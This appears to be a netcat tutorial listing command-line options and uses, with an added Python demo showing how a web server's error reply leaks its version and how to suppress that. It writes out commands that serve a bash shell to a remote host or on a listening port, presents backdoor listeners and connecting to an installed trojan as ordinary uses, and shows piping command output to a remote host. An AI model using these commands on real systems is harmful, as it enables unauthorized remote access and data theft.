How to use Netcat?
In the command prompt, browse (using the cd command) to the folder where you have placed your netcat exe file.
After this, you can just type nc at the cmd prompt to use it.
For example, if you wanted to access a trojan you installed, you would use the command
nc -v [host] [port]
Basic Netcat command-line options
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on a remote host:
nc remote_host [port]
Connect to multiple ports on a remote host:
nc remote_host [port1] [port2] ...
For example:
nc www.mysite.com 21 25 80
Listen on a port for incoming connections (also known as a back door):
nc -v -l -p [port]
Connect to a remote host and serve a bash shell:
nc remote_ip [port] -e /bin/bash
Listen on a port and serve a bash shell upon connect:
nc -v -l -p [port] -e /bin/bash
Note that Netcat does not support the -e flag by default. To make Netcat support the -e flag, it must be re-compiled with GAPING_SECURITY_HOLE defined (the -DGAPING_SECURITY_HOLE compile option).
Pipe command output to a netcat request:
[command] | nc remote_host [port]
For example (the two empty lines, typed by pressing Enter twice, send the blank line that ends the HTTP request):
echo "GET / HTTP/1.0

" | nc www.mysite.com 80
Spoofed HTTP probes
nc www.mysite.com [port]
User-Agent: swar Browser
Referer: abc.com
(press Enter twice)
This will generate an error message, which will display sensitive info about the target website.
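The exchange just described, as an added example that is not from the original post: a Python stand-in for the netcat session against a local http.server, with the stock handler (whose error reply names its software and version in the Server header) beside a hardened one that removes that disclosure. The probe bytes, the handler names and the "webserver" banner are constructed for this demo.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed probe in the spirit of the post's "spoofed HTTP probe": an unsupported
# method plus made-up User-Agent/Referer headers, sent raw exactly as netcat would.
PROBE = b"FOO / HTTP/1.0\r\nUser-Agent: swar Browser\r\nReferer: abc.com\r\n\r\n"


class LeakyHandler(BaseHTTPRequestHandler):
    """Stock http.server: its error replies carry 'Server: BaseHTTP/x.y Python/3.z'."""

    def log_message(self, *args):  # silence request logging for the demo
        pass


class HardenedHandler(LeakyHandler):
    """Same server, but the Server header no longer names software or versions."""

    def version_string(self):
        return "webserver"  # placeholder banner; any fixed, version-free string works


def probe(handler_cls, payload=PROBE):
    """Serve one request on 127.0.0.1 and return (status code, Server header)."""
    srv = HTTPServer(("127.0.0.1", 0), handler_cls)  # port 0 = any free port
    threading.Thread(target=srv.handle_request, daemon=True).start()
    with socket.create_connection(srv.server_address, timeout=5) as sock:
        sock.sendall(payload)
        raw = b""
        while chunk := sock.recv(4096):  # server closes after one HTTP/1.0 reply
            raw += chunk
    srv.server_close()
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1").split("\r\n")
    status = int(head[0].split()[1])
    headers = {k.strip().lower(): v.strip()
               for k, v in (line.split(":", 1) for line in head[1:] if ":" in line)}
    return status, headers.get("server", "")


def discloses_version(server_header):
    """A Server header containing a digit is naming a software version."""
    return any(ch.isdigit() for ch in server_header)


if __name__ == "__main__":
    for cls in (LeakyHandler, HardenedHandler):
        status, banner = probe(cls)
        print(f"{cls.__name__}: HTTP {status}, Server: {banner!r}, "
              f"version disclosed: {discloses_version(banner)}")
```

Both handlers still answer the bad request with HTTP 501; the difference a defender cares about is only in what the Server header gives away.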
What are the applications of Netcat?
Listening on a port
Connecting to a port
File transfer
Chatting
Executing applications
Sending spoofed HTTP probes
Proxy servers
Port scanning
Tips:
There are better tools for port scanning, but Netcat is a good one to start with.
To download:
Netcat (Windows)
Netcat (Unix)